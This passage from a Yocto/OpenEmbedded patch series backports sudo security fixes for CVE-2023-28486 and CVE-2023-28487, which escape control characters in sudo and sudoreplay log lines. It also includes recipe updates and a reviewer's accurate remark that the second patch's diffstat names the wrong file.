23 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
24 | --- | ||
25 | doc/sudoers.man.in | 33 +++++++-- | ||
26 | doc/sudoers.mdoc.in | 28 ++++++-- | ||
27 | doc/sudoreplay.man.in | 9 ++ | ||
28 | doc/sudoreplay.mdoc.in | 10 ++ | ||
29 | include/sudo_compat.h | 6 + | ||
30 | include/sudo_lbuf.h | 7 ++ | ||
31 | lib/util/lbuf.c | 106 +++++++++++++++++++++++++++++++ | ||
32 | lib/util/util.exp.in | 1 | ||
33 | plugins/sudoers/logging.c | 145 +++++++++++-------------------------------- | ||
34 | plugins/sudoers/sudoreplay.c | 44 +++++++++---- | ||
35 | 10 files changed, 257 insertions(+), 132 deletions(-) | ||
36 | |||
37 | --- a/doc/sudoers.man.in | ||
38 | +++ b/doc/sudoers.man.in | ||
39 | @@ -4566,6 +4566,19 @@ can log events using either | ||
40 | syslog(3) | ||
41 | or a simple log file. | ||
42 | The log format is almost identical in both cases. | ||
43 | +Any control characters present in the log data are formatted in octal | ||
44 | +with a leading | ||
45 | +\(oq#\(cq | ||
46 | +character. | ||
47 | +For example, a horizontal tab is stored as | ||
48 | +\(oq#011\(cq | ||
49 | +and an embedded carriage return is stored as | ||
50 | +\(oq#015\(cq. | ||
51 | +In addition, space characters in the command path are stored as | ||
52 | +\(oq#040\(cq. | ||
53 | +Literal single quotes and backslash characters | ||
54 | +(\(oq\e\(cq) | ||
55 | +in command line arguments are escaped with a backslash. | ||
56 | .SS "Accepted command log entries" | ||
57 | Commands that sudo runs are logged using the following format (split | ||
58 | into multiple lines for readability): | ||
59 | @@ -4646,7 +4659,7 @@ A list of environment variables specifie | ||
60 | if specified. | ||
61 | .TP 14n | ||
62 | command | ||
63 | -The actual command that was executed. | ||
64 | +The actual command that was executed, including any command line arguments. | ||
65 | .PP | ||
66 | Messages are logged using the locale specified by | ||
67 | \fIsudoers_locale\fR, | ||
68 | @@ -4882,17 +4895,21 @@ with a few important differences: | ||
69 | 1.\& | ||
70 | The | ||
71 | \fIprogname\fR | ||
72 | -and | ||
73 | -\fIhostname\fR | ||
74 | -fields are not present. | ||
75 | +field is not present. | ||
76 | .TP 5n | ||
77 | 2.\& | ||
78 | -If the | ||
79 | -\fIlog_year\fR | ||
80 | -option is enabled, | ||
81 | -the date will also include the year. | ||
82 | +The | ||
83 | +\fIhostname\fR | ||
84 | +is only logged if the | ||
85 | +\fIlog_host\fR | ||
86 | +option is enabled. | ||
87 | .TP 5n | ||
88 | 3.\& | ||
89 | +The date does not include the year unless the | ||
90 | +\fIlog_year\fR | ||
91 | +option is enabled. | ||
92 | +.TP 5n | ||
93 | +4.\& | ||
94 | Lines that are longer than | ||
95 | \fIloglinelen\fR | ||
96 | characters (80 by default) are word-wrapped and continued on the | ||
97 | --- a/doc/sudoers.mdoc.in | ||
98 | +++ b/doc/sudoers.mdoc.in | ||
99 | @@ -4261,6 +4261,19 @@ can log events using either | ||
100 | .Xr syslog 3 | ||
101 | or a simple log file. | ||
102 | The log format is almost identical in both cases. | ||
103 | +Any control characters present in the log data are formatted in octal | ||
104 | +with a leading | ||
105 | +.Ql # | ||
106 | +character. | ||
107 | +For example, a horizontal tab is stored as | ||
108 | +.Ql #011 | ||
109 | +and an embedded carriage return is stored as | ||
110 | +.Ql #015 . | ||
111 | +In addition, space characters in the command path are stored as | ||
112 | +.Ql #040 . | ||
113 | +Literal single quotes and backslash characters | ||
114 | +.Pq Ql \e | ||
115 | +in command line arguments are escaped with a backslash. | ||
116 | .Ss Accepted command log entries | ||
117 | Commands that sudo runs are logged using the following format (split | ||
118 | into multiple lines for readability): | ||
119 | @@ -4328,7 +4341,7 @@ option is enabled. | ||
120 | A list of environment variables specified on the command line, | ||
121 | if specified. | ||
122 | .It command | ||
123 | -The actual command that was executed. | ||
124 | +The actual command that was executed, including any command line arguments. | ||
125 | .El | ||
126 | .Pp | ||
127 | Messages are logged using the locale specified by | ||
128 | @@ -4550,14 +4563,17 @@ with a few important differences: | ||
129 | .It | ||
130 | The | ||
131 | .Em progname | ||
132 | -and | ||
133 | +field is not present. | ||
134 | +.It | ||
135 | +The | ||
136 | .Em hostname | ||
137 | -fields are not present. | ||
138 | +is only logged if the | ||
139 | +.Em log_host | ||
140 | +option is enabled. | ||
141 | .It | ||
142 | -If the | ||
143 | +The date does not include the year unless the | ||
144 | .Em log_year | ||
145 | -option is enabled, | ||
146 | -the date will also include the year. | ||
147 | +option is enabled. | ||
148 | .It | ||
149 | Lines that are longer than | ||
150 | .Em loglinelen | ||
151 | --- a/doc/sudoreplay.man.in | ||
152 | +++ b/doc/sudoreplay.man.in | ||
153 | @@ -149,6 +149,15 @@ In this mode, | ||
154 | will list available sessions in a format similar to the | ||
155 | \fBsudo\fR | ||
156 | log file format, sorted by file name (or sequence number). | ||
157 | +Any control characters present in the log data are formated in octal | ||
158 | +with a leading | ||
159 | +\(oq#\(cq | ||
160 | +character. | ||
161 | +For example, a horizontal tab is displayed as | ||
162 | +\(oq#011\(cq | ||
163 | +and an embedded carriage return is displayed as | ||
164 | +\(oq#015\(cq. | ||
165 | +.sp | ||
166 | If a | ||
167 | \fIsearch expression\fR | ||
168 | is specified, it will be used to restrict the IDs that are displayed. | ||
169 | --- a/doc/sudoreplay.mdoc.in | ||
170 | +++ b/doc/sudoreplay.mdoc.in | ||
171 | @@ -142,6 +142,16 @@ In this mode, | ||
172 | will list available sessions in a format similar to the | ||
173 | .Nm sudo | ||
174 | log file format, sorted by file name (or sequence number). | ||
175 | +Any control characters present in the log data are formatted in octal | ||
176 | +with a leading | ||
177 | +.Ql # | ||
178 | +character. | ||
179 | +For example, a horizontal tab is displayed as | ||
180 | +.Ql #011 | ||
181 | +and an embedded carriage return is displayed as | ||
182 | +.Ql #015 . | ||
183 | +Space characters in the command name and arguments are also formatted in octal. | ||
184 | +.Pp | ||
185 | If a | ||
186 | .Ar search expression | ||
187 | is specified, it will be used to restrict the IDs that are displayed. | ||
188 | --- a/include/sudo_compat.h | ||
189 | +++ b/include/sudo_compat.h | ||
190 | @@ -79,6 +79,12 @@ | ||
191 | # endif | ||
192 | #endif | ||
193 | |||
194 | +#ifdef HAVE_FALLTHROUGH_ATTRIBUTE | ||
195 | +# define FALLTHROUGH __attribute__((__fallthrough__)) | ||
196 | +#else | ||
197 | +# define FALLTHROUGH do { } while (0) | ||
198 | +#endif | ||
199 | + | ||
200 | /* | ||
201 | * Given the pointer x to the member m of the struct s, return | ||
202 | * a pointer to the containing structure. | ||
203 | --- a/include/sudo_lbuf.h | ||
204 | +++ b/include/sudo_lbuf.h | ||
205 | @@ -36,9 +36,15 @@ struct sudo_lbuf { | ||
206 | |||
207 | typedef int (*sudo_lbuf_output_t)(const char *); | ||
208 | |||
209 | +/* Flags for sudo_lbuf_append_esc() */ | ||
210 | +#define LBUF_ESC_CNTRL 0x01 | ||
211 | +#define LBUF_ESC_BLANK 0x02 | ||
212 | +#define LBUF_ESC_QUOTE 0x04 | ||
213 | + | ||
214 | __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols); | ||
215 | __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf); | ||
216 | __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3); | ||
217 | +__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4); | ||
218 | __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4); | ||
219 | __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf); | ||
220 | __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf); | ||
221 | @@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1( | ||
222 | #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e)) | ||
223 | #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a)) | ||
224 | #define sudo_lbuf_append sudo_lbuf_append_v1 | ||
225 | +#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1 | ||
226 | #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1 | ||
227 | #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a)) | ||
228 | #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a)) | ||
229 | --- a/lib/util/lbuf.c | ||
230 | +++ b/lib/util/lbuf.c | ||
231 | @@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf, | ||
232 | } | ||
233 | |||
234 | /* | ||
235 | + * Escape a character in octal form (#0n) and store it as a string | ||
236 | + * in buf, which must have at least 6 bytes available. | ||
237 | + * Returns the length of buf, not counting the terminating NUL byte. | ||
238 | + */ | ||
239 | +static int | ||
240 | +escape(unsigned char ch, char *buf) | ||
241 | +{ | ||
242 | + const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5; | ||
243 | + | ||
244 | + /* Work backwards from the least significant digit to most significant. */ | ||
245 | + switch (len) { | ||
246 | + case 5: | ||
247 | + buf[4] = (ch & 7) + '0'; | ||
248 | + ch >>= 3; | ||
249 | + FALLTHROUGH; | ||
250 | + case 4: | ||
251 | + buf[3] = (ch & 7) + '0'; | ||
252 | + ch >>= 3; | ||
253 | + FALLTHROUGH; | ||
254 | + case 3: | ||
255 | + buf[2] = (ch & 7) + '0'; | ||
256 | + buf[1] = '0'; | ||
257 | + buf[0] = '#'; | ||
258 | + break; | ||
259 | + } | ||
260 | + buf[len] = '\0'; | ||
261 | + | ||
262 | + return len; | ||
263 | +} | ||
264 | + | ||
265 | +/* | ||
266 | + * Parse the format and append strings, only %s and %% escapes are supported. | ||
267 | + * Any non-printable characters are escaped in octal as #0nn. | ||
268 | + */ | ||
269 | +bool | ||
270 | +sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) | ||
271 | +{ | ||
272 | + unsigned int saved_len = lbuf->len; | ||
273 | + bool ret = false; | ||
274 | + const char *s; | ||
275 | + va_list ap; | ||
276 | + debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL); | ||
277 | + | ||
278 | + if (sudo_lbuf_error(lbuf)) | ||
279 | + debug_return_bool(false); | ||
280 | + | ||
281 | +#define should_escape(ch) \ | ||
282 | + ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \ | ||
283 | + (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch))) | ||
284 | +#define should_quote(ch) \ | ||
285 | + (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\')) | ||
286 | + | ||
287 | + va_start(ap, fmt); | ||
288 | + while (*fmt != '\0') { | ||
289 | + if (fmt[0] == '%' && fmt[1] == 's') { | ||
290 | + if ((s = va_arg(ap, char *)) == NULL) | ||
291 | + s = "(NULL)"; | ||
292 | + while (*s != '\0') { | ||
293 | + if (should_escape(*s)) { | ||
294 | + if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1)) | ||
295 | + goto done; | ||
296 | + lbuf->len += escape(*s++, lbuf->buf + lbuf->len); | ||
297 | + continue; | ||
298 | + } | ||
299 | + if (should_quote(*s)) { | ||
300 | + if (!sudo_lbuf_expand(lbuf, 2)) | ||
301 | + goto done; | ||
302 | + lbuf->buf[lbuf->len++] = '\\'; | ||
303 | + lbuf->buf[lbuf->len++] = *s++; | ||
304 | + continue; | ||
305 | + } | ||
306 | + if (!sudo_lbuf_expand(lbuf, 1)) | ||
307 | + goto done; | ||
308 | + lbuf->buf[lbuf->len++] = *s++; | ||
309 | + } | ||
310 | + fmt += 2; | ||
311 | + continue; | ||
312 | + } | ||
313 | + if (should_escape(*fmt)) { | ||
314 | + if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1)) | ||
315 | + goto done; | ||
316 | + if (*fmt == '\'') { | ||
317 | + lbuf->buf[lbuf->len++] = '\\'; | ||
318 | + lbuf->buf[lbuf->len++] = *fmt++; | ||
319 | + } else { | ||
320 | + lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len); | ||
321 | + } | ||
322 | + continue; | ||
323 | + } | ||
324 | + if (!sudo_lbuf_expand(lbuf, 1)) | ||
325 | + goto done; | ||
326 | + lbuf->buf[lbuf->len++] = *fmt++; | ||
327 | + } | ||
328 | + ret = true; | ||
329 | + | ||
330 | +done: | ||
331 | + if (!ret) | ||
332 | + lbuf->len = saved_len; | ||
333 | + if (lbuf->size != 0) | ||
334 | + lbuf->buf[lbuf->len] = '\0'; | ||
335 | + va_end(ap); | ||
336 | + | ||
337 | + debug_return_bool(ret); | ||
338 | +} | ||
339 | + | ||
340 | +/* | ||
341 | * Parse the format and append strings, only %s and %% escapes are supported. | ||
342 | * Any characters in set are quoted with a backslash. | ||
343 | */ | ||
344 | --- a/lib/util/util.exp.in | ||
345 | +++ b/lib/util/util.exp.in | ||
346 | @@ -79,6 +79,7 @@ sudo_gethostname_v1 | ||
347 | sudo_gettime_awake_v1 | ||
348 | sudo_gettime_mono_v1 | ||
349 | sudo_gettime_real_v1 | ||
350 | +sudo_lbuf_append_esc_v1 | ||
351 | sudo_lbuf_append_quoted_v1 | ||
352 | sudo_lbuf_append_v1 | ||
353 | sudo_lbuf_clearerr_v1 | ||
354 | --- a/plugins/sudoers/logging.c | ||
355 | +++ b/plugins/sudoers/logging.c | ||
356 | @@ -58,6 +58,7 @@ | ||
357 | #include <syslog.h> | ||
358 | |||
359 | #include "sudoers.h" | ||
360 | +#include "sudo_lbuf.h" | ||
361 | |||
362 | #ifndef HAVE_GETADDRINFO | ||
363 | # include "compat/getaddrinfo.h" | ||
364 | @@ -940,14 +941,6 @@ should_mail(int status) | ||
365 | (def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS))); | ||
366 | } | ||
367 | |||
368 | -#define LL_TTY_STR "TTY=" | ||
369 | -#define LL_CWD_STR "PWD=" /* XXX - should be CWD= */ | ||
370 | -#define LL_USER_STR "USER=" | ||
371 | -#define LL_GROUP_STR "GROUP=" | ||
372 | -#define LL_ENV_STR "ENV=" | ||
373 | -#define LL_CMND_STR "COMMAND=" | ||
374 | -#define LL_TSID_STR "TSID=" | ||
375 | - | ||
376 | #define IS_SESSID(s) ( \ | ||
377 | isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \ | ||
378 | (s)[2] == '/' && \ | ||
379 | @@ -962,14 +955,16 @@ should_mail(int status) | ||
380 | static char * | ||
381 | new_logline(const char *message, const char *errstr) | ||
382 | { | ||
383 | - char *line = NULL, *evstr = NULL; | ||
384 | #ifndef SUDOERS_NO_SEQ | ||
385 | char sessid[7]; | ||
386 | #endif | ||
387 | const char *tsid = NULL; | ||
388 | - size_t len = 0; | ||
389 | + struct sudo_lbuf lbuf; | ||
390 | + int i; | ||
391 | debug_decl(new_logline, SUDOERS_DEBUG_LOGGING) | ||
392 | |||
393 | + sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0); | ||
394 | + | ||
395 | #ifndef SUDOERS_NO_SEQ | ||
396 | /* A TSID may be a sudoers-style session ID or a free-form string. */ | ||
397 | if (sudo_user.iolog_file != NULL) { | ||
398 | @@ -989,119 +984,55 @@ new_logline(const char *message, const c | ||
399 | #endif | ||
400 | |||
401 | /* | ||
402 | - * Compute line length | ||
403 | + * Format the log line as an lbuf, escaping control characters in | ||
404 | + * octal form (#0nn). Error checking (ENOMEM) is done at the end. | ||
405 | */ | ||
406 | - if (message != NULL) | ||
407 | - len += strlen(message) + 3; | ||
408 | - if (errstr != NULL) | ||
409 | - len += strlen(errstr) + 3; | ||
410 | - len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty); | ||
411 | - len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd); | ||
412 | - if (runas_pw != NULL) | ||
413 | - len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name); | ||
414 | - if (runas_gr != NULL) | ||
415 | - len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name); | ||
416 | - if (tsid != NULL) | ||
417 | - len += sizeof(LL_TSID_STR) + 2 + strlen(tsid); | ||
418 | - if (sudo_user.env_vars != NULL) { | ||
419 | - size_t evlen = 0; | ||
420 | - char * const *ep; | ||
421 | - | ||
422 | - for (ep = sudo_user.env_vars; *ep != NULL; ep++) | ||
423 | - evlen += strlen(*ep) + 1; | ||
424 | - if (evlen != 0) { | ||
425 | - if ((evstr = malloc(evlen)) == NULL) | ||
426 | - goto oom; | ||
427 | - evstr[0] = '\0'; | ||
428 | - for (ep = sudo_user.env_vars; *ep != NULL; ep++) { | ||
429 | - strlcat(evstr, *ep, evlen); | ||
430 | - strlcat(evstr, " ", evlen); /* NOTE: last one will fail */ | ||
431 | - } | ||
432 | - len += sizeof(LL_ENV_STR) + 2 + evlen; | ||
433 | - } | ||
434 | - } | ||
435 | - if (user_cmnd != NULL) { | ||
436 | - /* Note: we log "sudo -l command arg ..." as "list command arg ..." */ | ||
437 | - len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd); | ||
438 | - if (ISSET(sudo_mode, MODE_CHECK)) | ||
439 | - len += sizeof("list ") - 1; | ||
440 | - if (user_args != NULL) | ||
441 | - len += strlen(user_args) + 1; | ||
442 | - } | ||
443 | - | ||
444 | - /* | ||
445 | - * Allocate and build up the line. | ||
446 | - */ | ||
447 | - if ((line = malloc(++len)) == NULL) | ||
448 | - goto oom; | ||
449 | - line[0] = '\0'; | ||
450 | |||
451 | if (message != NULL) { | ||
452 | - if (strlcat(line, message, len) >= len || | ||
453 | - strlcat(line, errstr ? " : " : " ; ", len) >= len) | ||
454 | - goto toobig; | ||
455 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message, | ||
456 | + errstr ? " : " : " ; "); | ||
457 | } | ||
458 | if (errstr != NULL) { | ||
459 | - if (strlcat(line, errstr, len) >= len || | ||
460 | - strlcat(line, " ; ", len) >= len) | ||
461 | - goto toobig; | ||
462 | - } | ||
463 | - if (strlcat(line, LL_TTY_STR, len) >= len || | ||
464 | - strlcat(line, user_tty, len) >= len || | ||
465 | - strlcat(line, " ; ", len) >= len) | ||
466 | - goto toobig; | ||
467 | - if (strlcat(line, LL_CWD_STR, len) >= len || | ||
468 | - strlcat(line, user_cwd, len) >= len || | ||
469 | - strlcat(line, " ; ", len) >= len) | ||
470 | - goto toobig; | ||
471 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr); | ||
472 | + } | ||
473 | + if (user_tty != NULL) { | ||
474 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty); | ||
475 | + } | ||
476 | + if (user_cwd != NULL) { | ||
477 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd); | ||
478 | + } | ||
479 | if (runas_pw != NULL) { | ||
480 | - if (strlcat(line, LL_USER_STR, len) >= len || | ||
481 | - strlcat(line, runas_pw->pw_name, len) >= len || | ||
482 | - strlcat(line, " ; ", len) >= len) | ||
483 | - goto toobig; | ||
484 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", | ||
485 | + runas_pw->pw_name); | ||
486 | } | ||
487 | if (runas_gr != NULL) { | ||
488 | - if (strlcat(line, LL_GROUP_STR, len) >= len || | ||
489 | - strlcat(line, runas_gr->gr_name, len) >= len || | ||
490 | - strlcat(line, " ; ", len) >= len) | ||
491 | - goto toobig; | ||
492 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ", | ||
493 | + runas_gr->gr_name); | ||
494 | } | ||
495 | if (tsid != NULL) { | ||
496 | - if (strlcat(line, LL_TSID_STR, len) >= len || | ||
497 | - strlcat(line, tsid, len) >= len || | ||
498 | - strlcat(line, " ; ", len) >= len) | ||
499 | - goto toobig; | ||
500 | - } | ||
501 | - if (evstr != NULL) { | ||
502 | - if (strlcat(line, LL_ENV_STR, len) >= len || | ||
503 | - strlcat(line, evstr, len) >= len || | ||
504 | - strlcat(line, " ; ", len) >= len) | ||
505 | - goto toobig; | ||
506 | - free(evstr); | ||
507 | - evstr = NULL; | ||
508 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid); | ||
509 | + } | ||
510 | + if (sudo_user.env_vars != NULL) { | ||
511 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]); | ||
512 | + for (i = 1; sudo_user.env_vars[i] != NULL; i++) { | ||
513 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s", | ||
514 | + sudo_user.env_vars[i]); | ||
515 | + } | ||
516 | } | ||
517 | if (user_cmnd != NULL) { | ||
518 | - if (strlcat(line, LL_CMND_STR, len) >= len) | ||
519 | - goto toobig; | ||
520 | - if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len) | ||
521 | - goto toobig; | ||
522 | - if (strlcat(line, user_cmnd, len) >= len) | ||
523 | - goto toobig; | ||
524 | + sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK, | ||
525 | + "COMMAND=%s", user_cmnd); | ||
526 | if (user_args != NULL) { | ||
527 | - if (strlcat(line, " ", len) >= len || | ||
528 | - strlcat(line, user_args, len) >= len) | ||
529 | - goto toobig; | ||
530 | + sudo_lbuf_append_esc(&lbuf, | ||
531 | + LBUF_ESC_CNTRL|LBUF_ESC_QUOTE, | ||
532 | + " %s", user_args); | ||
533 | } | ||
534 | } | ||
535 | |||
536 | - debug_return_str(line); | ||
537 | -oom: | ||
538 | - free(evstr); | ||
539 | + if (!sudo_lbuf_error(&lbuf)) | ||
540 | + debug_return_str(lbuf.buf); | ||
541 | + | ||
542 | + sudo_lbuf_destroy(&lbuf); | ||
543 | sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory")); | ||
544 | debug_return_str(NULL); | ||
545 | -toobig: | ||
546 | - free(evstr); | ||
547 | - free(line); | ||
548 | - sudo_warnx(U_("internal error, %s overflow"), __func__); | ||
549 | - debug_return_str(NULL); | ||
550 | } | ||
551 | --- a/plugins/sudoers/sudoreplay.c | ||
552 | +++ b/plugins/sudoers/sudoreplay.c | ||
553 | @@ -71,6 +71,7 @@ | ||
554 | #include "sudo_conf.h" | ||
555 | #include "sudo_debug.h" | ||
556 | #include "sudo_event.h" | ||
557 | +#include "sudo_lbuf.h" | ||
558 | #include "sudo_util.h" | ||
559 | |||
560 | #ifdef HAVE_GETOPT_LONG | ||
561 | @@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head | ||
562 | } | ||
563 | |||
564 | static int | ||
565 | -list_session(char *logfile, regex_t *re, const char *user, const char *tty) | ||
566 | +list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re, | ||
567 | + const char *user, const char *tty) | ||
568 | { | ||
569 | char idbuf[7], *idstr, *cp; | ||
570 | const char *timestr; | ||
571 | @@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re, | ||
572 | } | ||
573 | /* XXX - print rows + cols? */ | ||
574 | timestr = get_timestr(li->tstamp, 1); | ||
575 | - printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ", | ||
576 | - timestr ? timestr : "invalid date", | ||
577 | - li->user, li->tty, li->cwd, li->runas_user); | ||
578 | - if (li->runas_group) | ||
579 | - printf("GROUP=%s ; ", li->runas_group); | ||
580 | - printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd); | ||
581 | - | ||
582 | - ret = 0; | ||
583 | - | ||
584 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ", | ||
585 | + timestr ? timestr : "invalid date", li->user); | ||
586 | + if (li->tty != NULL) { | ||
587 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", | ||
588 | + li->tty); | ||
589 | + } | ||
590 | + if (li->cwd != NULL) { | ||
591 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ", | ||
592 | + li->cwd); | ||
593 | + } | ||
594 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user); | ||
595 | + if (li->runas_group != NULL) { | ||
596 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ", | ||
597 | + li->runas_group); | ||
598 | + } | ||
599 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr); | ||
600 | + sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s", | ||
601 | + li->cmd); | ||
602 | + | ||
603 | + if (!sudo_lbuf_error(lbuf)) { | ||
604 | + puts(lbuf->buf); | ||
605 | + ret = 0; | ||
606 | + } | ||
607 | done: | ||
608 | + lbuf->error = 0; | ||
609 | + lbuf->len = 0; | ||
610 | free_log_info(li); | ||
611 | debug_return_int(ret); | ||
612 | } | ||
613 | @@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t * | ||
614 | DIR *d; | ||
615 | struct dirent *dp; | ||
616 | struct stat sb; | ||
617 | + struct sudo_lbuf lbuf; | ||
618 | size_t sdlen, sessions_len = 0, sessions_size = 0; | ||
619 | unsigned int i; | ||
620 | int len; | ||
621 | @@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t * | ||
622 | #endif | ||
623 | debug_decl(find_sessions, SUDO_DEBUG_UTIL) | ||
624 | |||
625 | + sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0); | ||
626 | + | ||
627 | d = opendir(dir); | ||
628 | if (d == NULL) | ||
629 | sudo_fatal(U_("unable to open %s"), dir); | ||
630 | @@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t * | ||
631 | |||
632 | /* Check for dir with a log file. */ | ||
633 | if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) { | ||
634 | - list_session(pathbuf, re, user, tty); | ||
635 | + list_session(&lbuf, pathbuf, re, user, tty); | ||
636 | } else { | ||
637 | /* Strip off "/log" and recurse if a dir. */ | ||
638 | pathbuf[sdlen + len - 4] = '\0'; | ||
639 | @@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t * | ||
640 | } | ||
641 | free(sessions); | ||
642 | } | ||
643 | + sudo_lbuf_destroy(&lbuf); | ||
644 | |||
645 | debug_return_int(0); | ||
646 | } | ||
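--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
@@ -0,0 +1,26 @@
+Backport of:
+
+From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Mon, 13 Mar 2023 08:04:32 -0600
+Subject: [PATCH] Add missing " ; " separator between environment variables and
+command. This is a regression introduced in sudo 1.9.13. GitHub issue #254.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+lib/eventlog/eventlog.c | 1 +
+1 file changed, 1 insertion(+)
+
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -1018,6 +1018,7 @@ new_logline(const char *message, const c
+sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
+sudo_user.env_vars[i]);
+}
++ sudo_lbuf_append(&lbuf, " ; ");
+}
+if (user_cmnd != NULL) {
+sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,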
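Review bot: The diffstat in this patch header lists `lib/eventlog/eventlog.c`, but the only hunk applies to `plugins/sudoers/logging.c`, so the header does not describe what the backport actually changes. A line under `Upstream-Status`, for example `Retargeted from lib/eventlog/eventlog.c to plugins/sudoers/logging.c for this sudo version`, would make the divergence from the upstream commit auditable. new_logline starts and ends outside the hunk, so the rest of the log-line assembly was not reviewed here.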
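--- a/meta/recipes-extended/sudo/sudo_1.8.32.bb
+++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb
@@ -4,6 +4,10 @@ SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \
 ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
 file://0001-Include-sys-types.h-for-id_t-definition.patch \
 file://0001-Fix-includes-when-building-with-musl.patch \
+file://CVE-2022-43995.patch \
+file://CVE-2023-22809.patch \
+file://CVE-2023-28486_CVE-2023-28487-1.patch \
+file://CVE-2023-28486_CVE-2023-28487-2.patch \
 "
 
 PAM_SRC_URI = "file://sudo.pam"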
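--- a/meta/recipes-extended/sysklogd/sysklogd.inc
+++ b/meta/recipes-extended/sysklogd/sysklogd.inc
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \
 
 inherit update-rc.d update-alternatives systemd autotools
 
-SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \
+SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \
 file://sysklogd \
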